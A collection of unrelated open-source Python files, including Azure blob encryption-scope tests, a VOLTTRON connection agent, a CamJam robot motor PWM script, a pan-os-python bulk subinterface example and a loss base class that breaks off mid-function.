self._teardown(bsc_with_sas_credential)
@pytest.mark.live_test_only
@BlobPreparer()
def test_copy_blob_from_url_with_ecryption_scope(self, storage_account_name, storage_account_key):
# Arrange
# create sas for source blob
sas_token = generate_account_sas(
storage_account_name,
account_key=storage_account_key,
resource_types=ResourceTypes(object=True, container=True),
permission=AccountSasPermissions(read=True, write=True, delete=True, list=True),
expiry=datetime.utcnow() + timedelta(hours=1),
)
bsc_with_sas_credential = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=sas_token,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc_with_sas_credential)
blob_client, _ = self._create_block_blob(bsc_with_sas_credential, blob_name="blockblob", data=b'AAABBBCCC', overwrite=True)
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
copied_blob = self.get_resource_name('copiedblob')
copied_blob_client = bsc.get_blob_client(self.container_name, copied_blob)
copied_blob_client.start_copy_from_url(blob_client.url, requires_sync=True,
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE)
props = copied_blob_client.get_blob_properties()
self.assertEqual(props.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
self._teardown(bsc_with_sas_credential)
@pytest.mark.live_test_only
@BlobPreparer()
def test_copy_with_user_delegation_encryption_scope_sas(self, storage_account_name, storage_account_key):
# Arrange
# to get user delegation key
oauth_token_credential = self.generate_oauth_token()
service_client = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=oauth_token_credential,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
user_delegation_key = service_client.get_user_delegation_key(datetime.utcnow(),
datetime.utcnow() + timedelta(hours=1))
self._setup(service_client)
blob_name = self.get_resource_name('blob')
sas_token = generate_blob_sas(
storage_account_name,
self.container_name,
blob_name,
account_key=user_delegation_key,
permission=BlobSasPermissions(read=True, write=True, create=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE
)
bsc_with_delegation_sas = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=sas_token,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
# blob is encrypted using TEST_SAS_ENCRYPTION_SCOPE
blob_client, _ = self._create_block_blob(bsc_with_delegation_sas, blob_name=blob_name, data=b'AAABBBCCC', overwrite=True)
props = blob_client.get_blob_properties()
self.assertEqual(props.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
self._teardown(service_client)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_container_with_default_cpk_n(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
container_client = bsc.create_container('cpkcontainer',
container_encryption_scope=TEST_CONTAINER_ENCRYPTION_KEY_SCOPE)
container_props = container_client.get_container_properties()
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, False)
for container in bsc.list_containers(name_starts_with='cpkcontainer'):
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, False)
blob_client = container_client.get_blob_client("appendblob")
        # provide an encryption scope when uploading the blob
resp = blob_client.upload_blob(b'aaaa', BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Use the provided encryption scope on the blob
self.assertEqual(resp['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
container_client.delete_container()
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_container_with_default_cpk_n_deny_override(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
container_client = bsc.create_container(
'denyoverridecpkcontainer',
container_encryption_scope=TEST_CONTAINER_ENCRYPTION_KEY_SCOPE_DENY_OVERRIDE
)
container_props = container_client.get_container_properties()
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, True)
for container in bsc.list_containers(name_starts_with='denyoverridecpkcontainer'):
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, True)
blob_client = container_client.get_blob_client("appendblob")
# It's not allowed to set encryption scope on the blob when the container denies encryption scope override.
with self.assertRaises(HttpResponseError):
blob_client.upload_blob(b'aaaa', BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
resp = blob_client.upload_blob(b'aaaa', BlobType.AppendBlob)
self.assertEqual(resp['encryption_scope'], TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
container_client.delete_container()
# ------------------------------------------------------------------------------
|
examples/shapes_from_glsl/window.py | szabolcsdombi/zengl | 116 | 12697511 | <gh_stars>100-1000
import pyglet
pyglet.options['shadow_window'] = False
pyglet.options['debug_gl'] = False
class Window(pyglet.window.Window):
def __init__(self, width, height):
self.time = 0.0
self.alive = True
self.mouse = (0, 0)
config = pyglet.gl.Config(
major_version=3,
minor_version=3,
forward_compatible=True,
double_buffer=False,
depth_size=0,
samples=0,
)
super().__init__(width=width, height=height, config=config, vsync=True)
width, height = self.get_framebuffer_size()
self.size = (width, height)
self.aspect = width / height
def on_resize(self, width, height):
pass
def on_draw(self):
pass
def on_mouse_motion(self, x, y, dx, dy):
self.mouse = (x, y)
def on_close(self):
self.alive = False
def update(self):
self.flip()
self.dispatch_events()
self.time += 1.0 / 60.0
return self.alive
@staticmethod
def run():
pyglet.app.run()
|
Codeforces/324 Division 2/Problem E/gen.py | VastoLorde95/Competitive-Programming | 170 | 12697539 | <reponame>VastoLorde95/Competitive-Programming
from random import *
import numpy
N = 10
a = numpy.random.permutation(N)
b = numpy.random.permutation(N)
print N
for i in a:
print i+1,
print
for i in b:
print i+1,
print
|
ghostwriter/rolodex/migrations/0021_project_timezone.py | bbhunter/Ghostwriter | 601 | 12697608 | # Generated by Django 3.1.13 on 2021-09-23 00:06
from django.db import migrations
import timezone_field.fields
class Migration(migrations.Migration):
dependencies = [
('rolodex', '0020_auto_20210922_2337'),
]
operations = [
migrations.AddField(
model_name='project',
name='timezone',
field=timezone_field.fields.TimeZoneField(default='America/Los_Angeles', help_text='Timezone of the project / working hours', verbose_name='Project Timezone'),
),
]
|
contracts/utils/utils.py | andrevmatos/microraiden | 417 | 12697618 | from web3 import Web3
from populus.utils.wait import wait_for_transaction_receipt
from eth_utils import keccak, is_0x_prefixed, decode_hex
from web3.utils.threads import (
Timeout,
)
def pack(*args) -> bytes:
"""
Simulates Solidity's sha3 packing. Integers can be passed as tuples where the second tuple
element specifies the variable's size in bits, e.g.:
sha3((5, 32))
would be equivalent to Solidity's
sha3(uint32(5))
Default size is 256.
"""
def format_int(value, size):
assert isinstance(value, int)
assert isinstance(size, int)
if value >= 0:
return decode_hex('{:x}'.format(value).zfill(size // 4))
else:
return decode_hex('{:x}'.format((1 << size) + value))
msg = b''
for arg in args:
assert arg
if isinstance(arg, bytes):
msg += arg
elif isinstance(arg, str):
if is_0x_prefixed(arg):
msg += decode_hex(arg)
else:
msg += arg.encode()
elif isinstance(arg, int):
msg += format_int(arg, 256)
elif isinstance(arg, tuple):
msg += format_int(arg[0], arg[1])
else:
raise ValueError('Unsupported type: {}.'.format(type(arg)))
return msg
def sol_sha3(*args) -> bytes:
return keccak(pack(*args))
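# Hedged usage sketch (illustrative values only, mirroring the docstring of
# ``pack``): hash a 32-bit integer together with a string, the same way
# Solidity would hash sha3(uint32(5), 'channel').
#
#     digest = sol_sha3((5, 32), 'channel')
#     assert len(digest) == 32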
def check_succesful_tx(web3: Web3, txid: str, timeout=180) -> dict:
'''See if transaction went through (Solidity code did not throw).
:return: Transaction receipt
'''
receipt = wait_for_transaction_receipt(web3, txid, timeout=timeout)
txinfo = web3.eth.getTransaction(txid)
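    # Pre-Byzantium heuristic: a failed (thrown) contract call consumes all of the
    # supplied gas, so a successful transaction should report gasUsed strictly
    # below the supplied gas limit.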
assert txinfo['gas'] != receipt['gasUsed']
return receipt
def wait(transfer_filter, timeout=30):
with Timeout(timeout) as timeout:
while not transfer_filter.get(False):
timeout.sleep(2)
|
services/core/VolttronCentralPlatform/vcplatform/vcconnection.py | architpansare/volttron | 406 | 12697640 | # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2020, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import logging
from volttron.platform.agent.known_identities import (
VOLTTRON_CENTRAL)
from volttron.platform.vip.agent import (Agent, RPC)
_log = logging.getLogger(__name__)
class VCConnection(Agent):
"""
    This agent connects to an instance that has a volttron.central agent
    running on it. The volttron.central agent uses this agent to communicate
    with the platform.agent (VCP) running on the current platform instance.
"""
def __init__(self, **kwargs):
self._log = logging.getLogger(self.__class__.__name__)
super(VCConnection, self).__init__(**kwargs)
self._main_agent = None
def set_main_agent(self, main_agent):
"""
The main agent is the VCP that is using this agent to connect to the
remote volttron instance.
:param main_agent: the agent that instantiated this one.
        :type main_agent: VolttronCentralPlatform
"""
self._main_agent = main_agent
def publish_to_vc(self, topic, message=None, headers={}):
"""
This method allows the main_agent to publish a message up to the
volttron.central instance.
:param topic:
:param message:
:param headers:
"""
self.vip.pubsub.publish('pubsub', topic, headers, message).get(timeout=5)
@RPC.export
def start_bacnet_scan(self, iam_topic, proxy_identity, low_device_id=None,
high_device_id=None, target_address=None,
scan_length=5):
"""
Starts a bacnet scan using the the named proxy_identity as the callee.
:param iam_topic:
:param proxy_identity:
:param low_device_id:
:param high_device_id:
:param target_address:
:param scan_length:
:return:
"""
self._main_agent.start_bacnet_scan(iam_vc_response_topic=iam_topic,
proxy_identity=proxy_identity,
low_device_id=low_device_id,
high_device_id=high_device_id,
target_address=target_address,
scan_length=scan_length)
@RPC.export
def get_instance_uuid(self):
"""
Retrieve the instance uuid for the vcp agent's instance.
:return:
"""
return self._main_agent.get_instance_uuid()
@RPC.export
def get_health(self):
"""
Retrieve the health of the vcp agent.
:return:
"""
return self._main_agent.vip.health.get_status()
@RPC.export
def start_agent(self, agent_uuid):
"""
Start an agent that is already present on the vcp instance.
:param agent_uuid:
:return:
"""
return self._main_agent.start_agent(agent_uuid)
@RPC.export
def stop_agent(self, agent_uuid):
"""
Stop an agent already running on the vcp instance.
:param agent_uuid:
:return:
"""
        return self._main_agent.stop_agent(agent_uuid)
@RPC.export
def restart(self, agent_uuid):
"""
Performs the stop and start operations on the vcp instance for an agent.
:param agent_uuid:
:return:
"""
stop_result = self.stop_agent(agent_uuid)
start_result = self.start_agent(agent_uuid)
return stop_result, start_result
@RPC.export
def agent_status(self, agent_uuid):
"""
Retrieves the status of a particular agent executing on the vcp
instance. The agent does not have to be executing in order to receive
it's status.
:param agent_uuid:
:return:
"""
return self._main_agent.agent_status(agent_uuid)
@RPC.export
def status_agents(self):
"""
Return all of the installed agents' statuses for the vcp instance.
:return:
"""
return self._main_agent.status_agents()
@RPC.export
def get_devices(self):
"""
Retrieves configuration entries from the config store that begin with
'devices'.
:return: dictionary of devices.
"""
self._log.debug("Getting devices in vcconnection.py")
return self._main_agent.get_devices()
@RPC.export
def publish_bacnet_props(self, proxy_identity, publish_topic, address,
device_id, filter=[]):
self._log.debug('Publishing bacnet props to topic: {}'.format(
publish_topic))
self._main_agent.publish_bacnet_props(
proxy_identity,
publish_topic,
address,
device_id,
filter=[])
@RPC.export
def store_agent_config(self, agent_identity, config_name, raw_contents,
config_type='raw'):
"""
Store an agent configuration on the volttron instance associated with
this agent.
:param agent_identity:
:param config_name:
:param raw_contents:
:param config_type:
:return: None
"""
return self._main_agent.store_agent_config(agent_identity, config_name,
raw_contents, config_type)
@RPC.export
def list_agent_configs(self, agent_identity):
"""
List the agent configuration files stored on the volttron instance
associated with this agent.
:param agent_identity: Agent identity to retrieve configuration from.
:return: A list of the configuration names.
"""
return self._main_agent.list_agent_configs(agent_identity)
@RPC.export
def get_agent_config(self, agent_identity, config_name, raw=True):
"""
Retrieve the configuration from the config store of the passed agent
identity.
:param agent_identity:
:param config_name:
:param raw:
:return: The stored configuration.
"""
return self._main_agent.get_agent_config(agent_identity, config_name,
raw)
@RPC.export
def delete_agent_config(self, agent_identity, config_name):
"""
Deletes the configuration from the config store of the passed agent
identity.
:param agent_identity:
:param config_name:
:return: The stored configuration.
"""
return self._main_agent.delete_agent_config(agent_identity, config_name)
@RPC.export
def subscribe_to_vcp(self, prefix, prefix_on_vc):
"""
Allows volttron.central to listen to the message bus on vcp instance.
:param prefix: The prefix to listen for.
:param prefix_on_vc:
The prefix to publish to on volttron central instance.
"""
self._log.info("VC subscribing to prefix: {}".format(prefix))
self._log.info("VCP will publish to {} on VC".format(prefix_on_vc))
def subscription_wrapper(peer, sender, bus, topic, headers,
message):
# We only publish up to vc for things that aren't forwarded.
if 'X-Forwarded' in headers:
return
self._log.debug("publishing to VC topic: {}".format(
prefix_on_vc + topic
))
# Prepend the specified prefix to the topic that was passed
# to the method
self.publish_to_vc(prefix_on_vc+topic, message, headers)
# Use the main agent to do the subscription on.
self._main_agent.vip.pubsub.subscribe('pubsub',
prefix,
subscription_wrapper)
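        # Hedged example of the resulting mapping (identifiers are made up):
        # subscribe_to_vcp('devices/', 'platforms/uuid/abc/') republishes a local
        # 'devices/campus/all' message to VC as 'platforms/uuid/abc/devices/campus/all'.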
@RPC.export
def call(self, platform_method, *args, **kwargs):
return self._main_agent.call(platform_method, *args, **kwargs)
def is_connected(self):
connected = self.vip.hello().get(timeout=5) is not None
self._log.debug("is_connected returning {}".format(connected))
return connected
def is_peer_connected(self, peer=VOLTTRON_CENTRAL):
connected = peer in self.vip.peerlist().get(timeout=5)
self._log.debug("is_connected returning {}".format(connected))
return connected
@RPC.export
def route_to_agent_method(self, id, agent_method, params):
"""
Calls a method on an installed agent running on the platform.
.. note::
This method only valid for installed agents not dynamic agents.
:param id:
:param agent_method:
:param params:
:return:
"""
self._log.debug("Routing method: {}".format(agent_method))
return self._main_agent.route_request(id, agent_method, params)
@RPC.export
def get_vip_addresses(self):
"""
Retrieves the vip addresses that were specified in the configuration
file or via command line.
:return:
"""
return self._main_agent.get_external_vip_addresses()
@RPC.export
def get_instance_name(self):
return self._main_agent.get_instance_name()
@RPC.export
def start_agent(self, agent_uuid):
"""
Calls start_agent method on the vcp main agent instance.
.. note::
            This method is only valid for installed agents, not dynamic agents.
:param agent_uuid:
:return:
"""
self._main_agent.start_agent(agent_uuid)
@RPC.export
def stop_agent(self, agent_uuid):
"""
Calls stop_agent method on the vcp main agent instance.
.. note::
            This method is only valid for installed agents, not dynamic agents.
:param agent_uuid:
:return:
"""
proc_result = self._main_agent.stop_agent(agent_uuid)
return proc_result
@RPC.export
def restart_agent(self, agent_uuid):
"""
Calls restart method on the vcp main agent instance.
.. note::
            This method is only valid for installed agents, not dynamic agents.
:param agent_uuid:
:return:
"""
return self._main_agent.restart(agent_uuid)
@RPC.export
def agent_status(self, agent_uuid):
"""
Calls agent_status method on the vcp main agent instance.
.. note::
            This method is only valid for installed agents, not dynamic agents.
:param agent_uuid:
:return:
"""
return self._main_agent.agent_status(agent_uuid)
@RPC.export
def status_agents(self):
"""
Calls status_agents method on the vcp main agent instance.
.. note::
            This method is only valid for installed agents, not dynamic agents.
:return:
"""
return self._main_agent.status_agents()
@RPC.export
def list_agents(self):
"""
Calls list_agents method on the vcp main agent instance.
.. note::
            This method is only valid for installed agents, not dynamic agents.
:return:
"""
return self._main_agent.list_agents()
@RPC.export
def install_agent(self, local_wheel_file):
"""
        Installs an agent on the platform from a local wheel file.
:param local_wheel_file:
:return:
"""
        return self._main_agent.install_agent(local_wheel_file)
|
modeling/__init__.py | MatthewAbugeja/agw | 501 | 12697674 | # encoding: utf-8
from .baseline import Baseline
def build_model(cfg, num_classes):
model = Baseline(num_classes, cfg.MODEL.LAST_STRIDE, cfg.MODEL.PRETRAIN_PATH, cfg.MODEL.NAME,
cfg.MODEL.GENERALIZED_MEAN_POOL, cfg.MODEL.PRETRAIN_CHOICE)
return model |
CamJam Edukit 3 - RPi.GPIO/Code/7-pwm.py | vincecr0ft/EduKit3 | 132 | 12697691 | # CamJam EduKit 3 - Robotics
# Worksheet 7 - Controlling the motors with PWM
import RPi.GPIO as GPIO # Import the GPIO Library
import time # Import the Time library
# Set the GPIO modes
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
# Set variables for the GPIO motor pins
pinMotorAForwards = 10
pinMotorABackwards = 9
pinMotorBForwards = 8
pinMotorBBackwards = 7
# How many times to turn the pin on and off each second
Frequency = 20
# How long the pin stays on each cycle, as a percent (here, it's 30%)
DutyCycle = 30
# Setting the duty cycle to 0 means the motors will not turn
Stop = 0
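# In other words, a larger duty cycle keeps the pin high for more of each
# cycle, so the motors spin faster; 100 would be full speed and 0 stops them.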
# Set the GPIO Pin mode to be Output
GPIO.setup(pinMotorAForwards, GPIO.OUT)
GPIO.setup(pinMotorABackwards, GPIO.OUT)
GPIO.setup(pinMotorBForwards, GPIO.OUT)
GPIO.setup(pinMotorBBackwards, GPIO.OUT)
# Set the GPIO to software PWM at 'Frequency' Hertz
pwmMotorAForwards = GPIO.PWM(pinMotorAForwards, Frequency)
pwmMotorABackwards = GPIO.PWM(pinMotorABackwards, Frequency)
pwmMotorBForwards = GPIO.PWM(pinMotorBForwards, Frequency)
pwmMotorBBackwards = GPIO.PWM(pinMotorBBackwards, Frequency)
# Start the software PWM with a duty cycle of 0 (i.e. not moving)
pwmMotorAForwards.start(Stop)
pwmMotorABackwards.start(Stop)
pwmMotorBForwards.start(Stop)
pwmMotorBBackwards.start(Stop)
# Turn all motors off
def stopmotors():
pwmMotorAForwards.ChangeDutyCycle(Stop)
pwmMotorABackwards.ChangeDutyCycle(Stop)
pwmMotorBForwards.ChangeDutyCycle(Stop)
pwmMotorBBackwards.ChangeDutyCycle(Stop)
# Turn both motors forwards
def forwards():
pwmMotorAForwards.ChangeDutyCycle(DutyCycle)
pwmMotorABackwards.ChangeDutyCycle(Stop)
pwmMotorBForwards.ChangeDutyCycle(DutyCycle)
pwmMotorBBackwards.ChangeDutyCycle(Stop)
# Turn both motors backwards
def backwards():
pwmMotorAForwards.ChangeDutyCycle(Stop)
pwmMotorABackwards.ChangeDutyCycle(DutyCycle)
pwmMotorBForwards.ChangeDutyCycle(Stop)
pwmMotorBBackwards.ChangeDutyCycle(DutyCycle)
# Turn left
def left():
pwmMotorAForwards.ChangeDutyCycle(Stop)
pwmMotorABackwards.ChangeDutyCycle(DutyCycle)
pwmMotorBForwards.ChangeDutyCycle(DutyCycle)
pwmMotorBBackwards.ChangeDutyCycle(Stop)
# Turn Right
def right():
pwmMotorAForwards.ChangeDutyCycle(DutyCycle)
pwmMotorABackwards.ChangeDutyCycle(Stop)
pwmMotorBForwards.ChangeDutyCycle(Stop)
pwmMotorBBackwards.ChangeDutyCycle(DutyCycle)
# Your code to control the robot goes below this line
forwards()
time.sleep(1) # Pause for 1 second
left()
time.sleep(0.5) # Pause for half a second
forwards()
time.sleep(1)
right()
time.sleep(0.5)
backwards()
time.sleep(0.5)
stopmotors()
GPIO.cleanup()
|
examples/bulk_subinterfaces.py | haginara/pan-os-python | 162 | 12697694 | #!/usr/bin/env python
# Copyright (c) 2017, Palo Alto Networks
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
bulk_subinterfaces.py
=====================
Use bulk operations to create / delete hundreds of firewall interfaces.
NOTE: Please update the hostname and auth credentials variables
before running.
The purpose of this script is to use and explain both the bulk operations
as they relate to subinterfaces and the new function that organizes
objects into vsys. This script shows how the bulk operations correctly
handle subinterface objects that live in separate vsys trees.
"""
import datetime
import random
import sys
from panos import device, firewall, network
HOSTNAME = "127.0.0.1"
USERNAME = "admin"
PASSWORD = "<PASSWORD>"
INTERFACE = "ethernet1/5"
def main():
# Before we begin, you'll need to use the pan-os-python documentation both
# for this example and for any scripts you may write for yourself. The
# docs can be found here:
#
# http://pan-os-python.readthedocs.io/en/latest/reference.html
#
# First, let's create the firewall object that we want to modify.
fw = firewall.Firewall(HOSTNAME, USERNAME, PASSWORD)
print("Firewall system info: {0}".format(fw.refresh_system_info()))
print("Desired interface: {0}".format(INTERFACE))
# Sanity Check #1: the intent here is that the interface we
# specified above should not already be in use. If the interface is
# already in use, then just quit out.
print("Making sure interface is not currently in use...")
interfaces = network.EthernetInterface.refreshall(fw, add=False)
for eth in interfaces:
if eth.name == INTERFACE:
print(
"Interface {0} already in use! Please choose another".format(INTERFACE)
)
return
# Sanity Check #2: this has to be a multi-vsys system. So let's make
# sure that we have multiple vsys to work with. If there is only one
# vsys, quit out.
#
    # Pulling the entire vsys config from each vsys is going to be a large amount
# of XML, so we'll specify that we only need the names of the different
# vsys, not their entire subtrees.
vsys_list = device.Vsys.refreshall(fw, name_only=True)
print("Found the following vsys: {0}".format(vsys_list))
if len(vsys_list) < 2:
print("Only {0} vsys present, need 2 or more.".format(len(vsys_list)))
return
# Let's make our base interface that we're going to make subinterfaces
# out of.
print("Creating base interface {0} in layer2 mode".format(INTERFACE))
base = network.EthernetInterface(INTERFACE, "layer2")
# Like normal, after creating the object, we need to add it to the
# firewall, then finally invoke "create()" to create it.
fw.add(base)
base.create()
# Now let's go ahead and make all of our subinterfaces.
eth = None
for tag in range(1, 601):
name = "{0}.{1}".format(INTERFACE, tag)
eth = network.Layer2Subinterface(name, tag)
# Choose one of the vsys at random to put it into.
vsys = random.choice(vsys_list)
# Now add the subinterface to that randomly chosen vsys.
vsys.add(eth)
# You'll notice that we didn't invoke "create()" on the subinterfaces like
# you would expect. This is because we're going to use the bulk create
# function to create all of the subinterfaces in one shot, which has huge
# performance gains from doing "create()" on each subinterface one-by-one.
#
# The function we'll use is "create_similar()". Create similar is saying,
# "I want to create all objects similar to this one in my entire pan-os-python
# object tree." In this case, since we'd be invoking it on a subinterface
# of INTERFACE (our variable above), we are asking pan-os-python to create all
# subinterfaces of INTERFACE, no matter which vsys it exists in.
#
# We just need any subinterface to do this. Since our last subinterface
# was saved to the "eth" variable in the above loop, we can just use that
# to invoke "create_similar()".
print("Creating subinterfaces...")
start = datetime.datetime.now()
eth.create_similar()
print("Creating subinterfaces took: {0}".format(datetime.datetime.now() - start))
# Now let's explore updating them. Let's say this is a completely
# different script, and we want to update all of the subinterfaces
# for INTERFACE. Since this is a completely new script, we don't have any
# information other than the firewall and the interface INTERFACE. So
# let's start from scratch at this point, and remake the firewall object
# and connect.
print("\n--------\n")
fw = firewall.Firewall(HOSTNAME, USERNAME, PASSWORD)
print("Firewall system info: {0}".format(fw.refresh_system_info()))
print("Desired interface: {0}".format(INTERFACE))
# Make the base interface object and connect it to our pan-os-python tree.
base = network.EthernetInterface(INTERFACE, "layer2")
fw.add(base)
# Now let's get all the subinterfaces for INTERFACE. Since our firewall's
# default vsys is "None", this will get all subinterfaces of INTERFACE,
# regardless of which vsys it exists in.
print("Refreshing subinterfaces...")
subinterfaces = network.Layer2Subinterface.refreshall(base)
print("Found {0} subinterfaces".format(len(subinterfaces)))
# Now let's go ahead and update all of them.
for eth in subinterfaces:
eth.comment = "Tagged {0} and in vsys {1}".format(eth.tag, eth.vsys)
# Now that we have updated all of the subinterfaces, we need to save
# the changes to the firewall. But hold on a second, the vsys for these
# subinterfaces is currently "None". We first need to organize these
# subinterfaces into the vsys they actually exist in before we can
# apply these changes to the firewall.
#
# This is where you can use the function "organize_into_vsys()". This
# takes all objects currently attached to your pan-os-python object tree
# and organizes them into the vsys they belong to.
#
# We haven't gotten the current vsys yet (this is a new script, remember),
# but the function can take care of that for us. So let's just invoke it
# to organize our pan-os-python object tree into vsys.
print("Organizing subinterfaces into vsys...")
fw.organize_into_vsys()
# Now we're ready to save our changes. We'll use "apply_similar()",
# and it behaves similarly to "create_similar()" in that you can invoke
# it from any subinterface of INTERFACE and it will apply all of the
# changes to subinterfaces of INTERFACE only.
#
# We just need one subinterface to invoke this function. Again, we'll
# simply use the subinterface currently saved in the "eth" variable
# from our update loop we did just above.
#
# NOTE: As an "apply()" function, apply does a replace of config, not
# a simple update. So you must be careful that all other objects are
# currently attached to your pan-os-python object tree when using apply
# functions. In our case, we have already refreshed all layer2
# subinterfaces, and we are the only ones working with INTERFACE, so we
# are safe to use this function.
print("Updating all subinterfaces...")
start = datetime.datetime.now()
eth.apply_similar()
print("Updating subinterfaces took: {0}".format(datetime.datetime.now() - start))
# Finally, all that's left is to delete all of the subinterfaces. This
# is just like you think: we first need to refresh all of the
# subinterfaces of INTERFACE, organize them into their appropriate vsys,
# then invoke "delete_similar()" to delete everything.
print("Deleting all subinterfaces...")
start = datetime.datetime.now()
eth.delete_similar()
print("Deleting subinterfaces took: {0}".format(datetime.datetime.now() - start))
# Lastly, let's just delete the base interface INTERFACE.
print("Deleting base interface...")
base.delete()
# And now we're done! If performance is a bottleneck in your automation,
# or dealing with vsys is troublesome, consider using the vsys organizing
# and/or bulk functions!
print("Done!")
if __name__ == "__main__":
# This script doesn't take command line arguments. If any are passed in,
# then print out the script's docstring and exit.
if len(sys.argv) != 1:
print(__doc__)
else:
# No CLI args, so run the main function.
main()
|
Lib/async/examples/disconnect.py | pyparallel/pyparallel | 652 | 12697699 | import time
import async
class Disconnect:
pass
server = async.server('10.211.55.3', 20019)
async.register(transport=server, protocol=Disconnect)
async.run()
|
up/models/losses/loss.py | ModelTC/EOD | 196 | 12697705 | <filename>up/models/losses/loss.py
# Import from third library
from torch.nn.modules.loss import _Loss
def _reduce(loss, reduction, **kwargs):
if reduction == 'none':
ret = loss
elif reduction == 'mean':
normalizer = loss.numel()
if kwargs.get('normalizer', None):
normalizer = kwargs['normalizer']
ret = loss.sum() / normalizer
elif reduction == 'sum':
ret = loss.sum()
else:
raise ValueError(reduction + ' is not valid')
return ret
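# For example (values are illustrative): _reduce(loss, 'mean') averages over
# loss.numel(), while _reduce(loss, 'mean', normalizer=num_pos) divides the
# summed loss by num_pos instead.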
class BaseLoss(_Loss):
    # do not use syntax like `super(xxx, self).__init__()`,
    # which will cause infinite recursion when using a class decorator
def __init__(self,
name='base',
reduction='none',
loss_weight=1.0):
r"""
Arguments:
- name (:obj:`str`): name of the loss function
- reduction (:obj:`str`): reduction type, choice of mean, none, sum
- loss_weight (:obj:`float`): loss weight
"""
_Loss.__init__(self, reduction=reduction)
self.loss_weight = loss_weight
self.name = name
def __call__(self, input, target, reduction_override=None, normalizer_override=None, **kwargs):
r"""
Arguments:
- input (:obj:`Tensor`)
- reduction (:obj:`Tensor`)
- reduction_override (:obj:`str`): choice of 'none', 'mean', 'sum', override the reduction type
defined in __init__ function
- normalizer_override (:obj:`float`): override the normalizer when reduction is 'mean'
"""
reduction = reduction_override if reduction_override else self.reduction
assert (normalizer_override is None or reduction == 'mean'), \
f'normalizer is not allowed when reduction is {reduction}'
